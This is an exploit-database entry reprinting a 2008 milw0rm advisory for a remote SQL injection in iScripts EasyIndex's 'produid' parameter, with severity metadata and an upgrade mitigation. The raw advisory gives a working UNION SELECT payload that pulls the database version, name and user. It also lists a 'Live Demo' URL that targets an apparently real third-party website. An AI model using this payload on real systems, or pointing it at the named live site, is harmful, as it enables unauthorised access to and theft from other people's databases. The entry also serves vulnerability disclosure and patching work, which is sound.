header-logo
Suggest Exploit
vendor:
EasyIndex
by:
SirGod
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: EasyIndex
Affected Version From: Prior to 2.0
Affected Version To: Prior to 2.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

iScripts EasyIndex (produid) Remote SQL Injection

iScripts EasyIndex is prone to a remote SQL injection vulnerability. An attacker can exploit this issue to manipulate SQL queries and gain access to sensitive information that may lead to further attacks. This issue affects versions prior to iScripts EasyIndex 2.0; other versions may also be affected.

Mitigation:

Upgrade to version 2.0 or later.
Source

Exploit-DB raw data:

#########################################################################################################################
[+] iScripts EasyIndex (produid) Remote SQL Injection
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
########################################################################################################################
 [+] Remote SQL Injection


   PoC :

      http://[target]/[path]/detaillist.php?produid=[SQL]


   Example :

      http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all
select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


   Live Demo :

      http://www.dawsonvalley.net/business/detaillist.php?produid=-1
union all select
1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


   - Note : the number of colums can vary.


##########################################################################################################################

# milw0rm.com [2008-09-16]